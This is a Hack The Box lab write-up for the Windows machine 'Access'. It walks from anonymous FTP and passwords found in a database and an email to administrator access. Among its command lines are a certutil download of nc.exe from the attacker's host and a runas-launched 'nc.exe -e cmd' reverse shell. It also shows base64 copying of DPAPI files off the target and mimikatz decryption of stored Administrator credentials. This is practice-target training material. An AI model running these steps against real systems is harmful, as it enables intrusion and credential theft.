Access
Ports Scan
root@kali:~# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.98 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-22 14:06:32 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.98
Discovered open port 23/tcp on 10.10.10.98
Discovered open port 80/tcp on 10.10.10.98
root@kali:~/HTB/Machines/Access# nmap -sC -sV 10.10.10.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 09:07 EST
Nmap scan report for access.htb (10.10.10.98)
Host is up (0.045s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.22 seconds
Web enumeration
Web enumeration yields nothing useful (only index.html).
u505@kali:~/HTB/Machines/Access$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "asax,ascx,ashx,asmx,aspx,axd,browser,cd,compile,config,cs,vb,csproj,vbproj,disco,vsdisco,dsdgm,dsprototype,dll,licx,webinfo,master,mdb,ldb,mdf,msgx,svc,resources,resx,sdm,sdmDocument,sitemap,skin,sln,soap,asa,cdx,cer,idc,shtm,shtml,stm,css,htm,html,jpg,jpeg,png,tiff,bmp,svg,gif,ico,tga,xcf,dwg,pdf" -f -t 1000 -u http://10.10.10.98
 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asax, ascx, ashx, asmx, aspx, axd, browser, cd, compile, config, cs, vb, csproj, vbproj, disco, vsdisco, dsdgm, dsprototype, dll, licx, webinfo, master, mdb, ldb, mdf, msgx, svc, resources, resx, sdm, sdmDocument, sitemap, skin, sln, soap, asa, cdx, cer, idc, shtm, shtml, stm, css, htm, html, jpg, jpeg, png, tiff, bmp, svg, gif, ico, tga, xcf, dwg, pdf | HTTP method: get | Threads: 1000 | Wordlist size: 12790217

Error Log: /opt/utils/dirsearch/logs/errors-20-02-11_21-09-08.log

Target: http://10.10.10.98

[21:09:08] Starting:
[21:09:16] 200 -  391B - /index.html
[21:10:34] 200 -  87KB - /out.jpg
[21:10:41] 200 -  391B - /Index.html
[21:11:13] 403 -   2KB - /trace.axd
[21:20:48] 200 -  391B - /INDEX.html
[22:44:04] 403 -   2KB - /Trace.axd
FTP
The FTP server contains interesting files.
u505@kali:~/HTB/Machines/Access$ ftp access
Connected to access.htb.
220 Microsoft FTP Service
Name (access:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 3.97 secs (1.3588 MB/s)
ftp> cd ../Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10870 bytes received in 0.22 secs (48.9563 kB/s)
ftp> quit
221 Goodbye.
Unzip Access Control.zip
u505@kali:~/HTB/Machines/Access$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

Enter password (will not be echoed):
ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
The file is encrypted.
Brute force
We create the hash file for john
u505@kali:~/HTB/Machines/Access$ zip2john Access\ Control.zip > ziphash.txt
ver 2.0 Access Control.zip/Access Control.pst PKZIP Encr: cmplen=10678, decmplen=271360, crc=1D60603C
And try to crack it, but john fails to crack the password with rockyou.
u505@kali:~/HTB/Machines/Access$ john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ziphash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:03:34 DONE (2020-02-11 21:29) 0g/s 66823p/s 66823c/s 66823C/s "chido"..*7¡Vamos!
Session completed
Analyze the backup.mdb
With the mdbtools utilities mdb-tables and mdb-export we extract the information from the Access database.
u505@kali:~/HTB/Machines/Access/work$ cat extract.sh
#!/bin/sh
# Dump every table of the Access database as CSV, one labelled section per table.
tables=`mdb-tables backup.mdb`
for table in $tables
do
    echo "---------------------------$table--------------------------------"
    mdb-export backup.mdb "$table"
done
Running the script exports all the information.
u505@kali:~/HTB/Machines/Access/work$ ./extract.sh > export
Diving into the exported file, we find a password.
u505@kali:~/HTB/Machines/Access/work$ grep -n password export -A5
104:id,username,password,Status,last_login,RoleID,Remark
105-25,"admin","admin",1,"08/23/18 21:11:47",26,
106-27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
107-28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
108----------------------------auth_user_groups--------------------------------
109-id,user_id,group_id
Use the password with the zip file
u505@kali:~/HTB/Machines/Access$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz (506E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870

Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870
The pst file is decrypted.
u505@kali:~/HTB/Machines/Access$ ls -l "Access Control.pst"
-rw-r--r-- 1 u505 u505 271360 Aug 23 2018 'Access Control.pst'
Read pst file
With the application MailStore, pst files can be opened.
The Outlook pst file contains an email with the password for the user security.
An alternative is to use the command readpst
u505@kali:~/HTB/Machines/Access$ mkdir mails
u505@kali:~/HTB/Machines/Access$ readpst "Access_Control.pst" -o mails/
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.
And open the mbox file with mutt
u505@kali:~/HTB/Machines/Access/mails$ mutt -f "Access Control.mbox"
i:Exit  -:PrevPg  <Space>:NextPg  v:View Attachm.  d:Del  r:Reply  j:Next  ?:Help
Date: Thu, 23 Aug 2018 23:44:07 +0000
From: "john@megacorp.com" <john@megacorp.com>
To: 'security@accesscontrolsystems.com'
Subject: MegaCorp Access Control System "security" account
[-- Attachment #1 --] [-- Type: multipart/alternative, Encoding: 7bit, Size: 2.5K --]
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
- - 1/1: john@megacorp.com  MegaCorp Access Control System "secur -- (all)
Mailbox is unchanged.
u505@kali:~/HTB/Machines/Access/mails$
User flag
With the user security and its password we can log in over telnet and obtain the user flag.
u505@kali:~/HTB/Machines/Access/mails$ telnet access
Trying 10.10.10.98...
Connected to access.htb.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop
C:\Users\security\Desktop>type user.txt <USER_FLAG>
Privilege escalation
Consult the PayloadsAllTheThings Windows privilege escalation notes:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
or, locally: cat "/usr/share/payloadsallthethings/Methodology and Resources/Windows - Privilege Escalation.md"
EoP - Runas
C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

The /savecred option of runas then lets us run a command with the saved credentials.
Another way to discover that stored credentials exist is to look at this shortcut.
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
[binary .lnk output; only the readable strings are kept]
C:\Windows\System32\runas.exe
..\..\..\Windows\System32\runas.exe
C:\ZKTeco\ZKAccess3.5
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
S-1-5-21-953262931-566350628-63446256-500

C:\Users\Public\Desktop>
Upload nc.exe
Start a web server on our machine so the target can download nc.exe.
u505@kali:~/HTB/Machines/Access$ mkdir www
u505@kali:~/HTB/Machines/Access$ cd www/
u505@kali:~/HTB/Machines/Access/www$ cp /usr/share/windows-resources/binaries/nc.exe ./
u505@kali:~/HTB/Machines/Access/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target
C:\Users\security>certutil -urlcache -split -f "http://10.10.14.26/nc.exe" nc.exe
****  Online  ****
  0000  ...
  e800
CertUtil: -URLCache command completed successfully.
Reverse shell
Start the listener
u505@kali:~/HTB/Machines/Access/www$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
If we try without runas, a group policy restriction on the user security blocks it.
C:\Users\security>nc.exe -e cmd 10.10.14.26 4444
This program is blocked by group policy. For more information, contact your system administrator.
But if we run as administrator there is no limitation.
C:\Users\security>runas /user:ACCESS\administrator /savecred "nc.exe -e cmd 10.10.14.26 4444"
And a reverse shell opens in our listener
u505@kali:~/HTB/Machines/Access/www$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.98.
Ncat: Connection from 10.10.10.98:49170.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
access\administrator
Root flag
C:\Windows\system32>cd c:\users\Administrator\Desktop
cd c:\users\Administrator\Desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>
Decrypt the Administrator credentials
Obtain files from target machine
The Administrator credentials are stored, DPAPI-protected, in the profile of the user security. We can decrypt them with mimikatz.
The master key of the user security allows decrypting the stored Administrator credentials.
Master key:
C:\Users\security>dir /a C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001

08/22/2018  09:18 PM    <DIR>          .
08/22/2018  09:18 PM    <DIR>          ..
08/22/2018  09:18 PM               468 0792c32e-48a5-4fe3-8b43-d93d64590580
08/22/2018  09:18 PM                24 Preferred
               2 File(s)            492 bytes
               2 Dir(s)  16,771,567,616 bytes free
Administrator Credentials:
C:\Users\security>dir /a C:\Users\security\AppData\Roaming\Microsoft\Credentials
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Credentials

01/22/2020  08:33 PM    <DIR>          .
01/22/2020  08:33 PM    <DIR>          ..
08/22/2018  09:18 PM               538 51AB168BE4BDB3A603DADE4F8CA81290
01/22/2020  08:33 PM                 0 cd
               2 File(s)            538 bytes
               2 Dir(s)  16,771,567,616 bytes free
The easiest way to transfer the master key and the encrypted credentials is to transform them to base64 and simply copy them. We can use certutil to encode the files.
C:\Users\security>certutil -encode C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 0792c32e-48a5-4fe3-8b43-d93d64590580.b64
Input Length = 468
Output Length = 700
CertUtil: -encode command completed successfully.

C:\Users\security>certutil -encode C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290 51AB168BE4BDB3A603DADE4F8CA81290.b64
Input Length = 538
Output Length = 800
CertUtil: -encode command completed successfully.
C:\Users\security>type *.b64
0792c32e-48a5-4fe3-8b43-d93d64590580.b64
51AB168BE4BDB3A603DADE4F8CA81290.b64
Obtain SID of ACCESS\security
C:\Users\security>whoami /user
USER INFORMATION
----------------

User Name       SID
=============== ==========================================
access\security S-1-5-21-953262931-566350628-63446256-1001
Copy and decode files
On our machine, we copy and decode the 2 files
u505@kali:~/HTB/Machines/Access$ vi 0792c32e-48a5-4fe3-8b43-d93d64590580.b64
u505@kali:~/HTB/Machines/Access$ vi 51AB168BE4BDB3A603DADE4F8CA81290.b64
u505@kali:~/HTB/Machines/Access$ base64 -d 0792c32e-48a5-4fe3-8b43-d93d64590580.b64 > 0792c32e-48a5-4fe3-8b43-d93d64590580
u505@kali:~/HTB/Machines/Access$ base64 -d 51AB168BE4BDB3A603DADE4F8CA81290.b64 > 51AB168BE4BDB3A603DADE4F8CA81290
And we transfer these files to our Windows machine with mimikatz installed.
Mimikatz
First, we load the master key in memory.
  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # dpapi::masterkey /in:C:\Users\u505\Desktop\Access\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion : 00000002 - 2
    salt      : 9c51ca4d00708c73d4fbff60b95e549e
    rounds    : 000043f8 - 17400
    algHash   : 0000800e - 32782 (CALG_SHA_512)
    algCrypt  : 00006610 - 26128 (CALG_AES_256)
    pbKey     : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion : 00000002 - 2
    salt      : 4bb6dd9b5b9656d97b78f114796457f4
    rounds    : 000043f8 - 17400
    algHash   : 0000800e - 32782 (CALG_SHA_512)
    algCrypt  : 00006610 - 26128 (CALG_AES_256)
    pbKey     : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion : 00000003 - 3
    guid      : {009668e5-9305-401b-ba0d-dfa0e11b34d0}

[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
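To make the fields mimikatz lists above concrete, here is an added example (not part of the original writeup and not mimikatz code) that assembles a DPAPI master key file in the layout mimikatz reads, using the GUID, flags, section lengths, salts, round count and algorithm ids reported above with constructed placeholder key bytes, and then parses it back field by field.

```python
import struct
import uuid

# DPAPI master key file layout, as dumped by mimikatz dpapi::masterkey:
#   file header : dwVersion, 2 reserved DWORDs, szGuid (36 UTF-16LE chars),
#                 2 reserved DWORDs, dwFlags, then 64-bit lengths of the
#                 MasterKey, BackupKey, CredHist and DomainKey sections
#   key section : dwVersion, 16-byte salt, rounds, algHash, algCrypt, pbKey
#   credhist    : dwVersion, 16-byte GUID (little-endian GUID layout)
FILE_HDR = "<III72sIIIQQQQ"
KEY_HDR = "<I16sIII"
CREDHIST = "<I16s"
CALG_SHA_512 = 0x800E
CALG_AES_256 = 0x6610


def build_key_section(salt, rounds, key):
    """Serialise one MASTERKEY section (constructed for this example)."""
    return struct.pack(KEY_HDR, 2, salt, rounds, CALG_SHA_512, CALG_AES_256) + key


def build_masterkey_file(guid, flags, masterkey, backupkey, credhist):
    """Assemble header + sections; the header records each section's length."""
    hdr = struct.pack(FILE_HDR, 2, 0, 0, guid.encode("utf-16-le"), 0, 0, flags,
                      len(masterkey), len(backupkey), len(credhist), 0)
    return hdr + masterkey + backupkey + credhist


def parse_key_section(blob):
    version, salt, rounds, alg_hash, alg_crypt = struct.unpack_from(KEY_HDR, blob)
    return {"version": version, "salt": salt.hex(), "rounds": rounds,
            "alg_hash": alg_hash, "alg_crypt": alg_crypt,
            "key": blob[struct.calcsize(KEY_HDR):].hex()}


def parse_masterkey_file(data):
    """Parse the header, then walk the sections by the lengths it declares."""
    (version, _, _, guid, _, _, flags,
     mk_len, bk_len, ch_len, dk_len) = struct.unpack_from(FILE_HDR, data)
    off = struct.calcsize(FILE_HDR)
    # A truncated or tampered file shows up here before any section is read.
    if off + mk_len + bk_len + ch_len + dk_len != len(data):
        raise ValueError("section lengths do not match file size")
    masterkey = parse_key_section(data[off:off + mk_len])
    off += mk_len
    backupkey = parse_key_section(data[off:off + bk_len])
    off += bk_len
    ch_version, ch_guid = struct.unpack_from(CREDHIST, data, off)
    return {"version": version, "guid": guid.decode("utf-16-le"), "flags": flags,
            "lengths": (mk_len, bk_len, ch_len, dk_len),
            "masterkey": masterkey, "backupkey": backupkey,
            "credhist": {"version": ch_version,
                         "guid": str(uuid.UUID(bytes_le=ch_guid))}}


def demo():
    """Rebuild the file from the values mimikatz printed above and parse it back.
    The pbKey bytes are constructed placeholders, not the real key material."""
    mk = build_key_section(bytes.fromhex("9c51ca4d00708c73d4fbff60b95e549e"),
                           17400, bytes(range(144)))
    bk = build_key_section(bytes.fromhex("4bb6dd9b5b9656d97b78f114796457f4"),
                           17400, bytes(112))
    ch = struct.pack(CREDHIST, 3,
                     uuid.UUID("009668e5-9305-401b-ba0d-dfa0e11b34d0").bytes_le)
    data = build_masterkey_file("0792c32e-48a5-4fe3-8b43-d93d64590580", 5, mk, bk, ch)
    assert len(data) == 468  # matches certutil's "Input Length = 468" above
    return parse_masterkey_file(data)
```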
Check the cache
mimikatz # dpapi::cache
CREDENTIALS cache
=================
SID:S-1-5-21-953262931-566350628-63446256-1001;GUID:{009668e5-9305-401b-ba0d-dfa0e11b34d0};MD4:b41db16a61cb04b231625de260163015;SHA1:75f1e3aa023a0f57d4225f3ab4f18f6fea025414;

MASTERKEYS cache
================
GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe

DOMAINKEYS cache
================
Decrypt the Administrator credentials
mimikatz # dpapi::cred /in:C:\Users\u505\Desktop\Access\51AB168BE4BDB3A603DADE4F8CA81290
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data
  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : (omitted)
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 21:18:49
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0
Access system
With the recovered password we can now telnet in as Administrator.
u505@kali:~/HTB/Machines/Access/mails$ telnet access
Trying 10.10.10.98...
Connected to access.htb.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: administrator password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>whoami
access\administrator
References
- How to crack protected zip files using John the Ripper (JTR) in Kali
- JAWS - Just Another Windows (Enum) Script
- Windows - Privilege Escalation
Daniel Simao 09:04, 22 January 2020 (EST)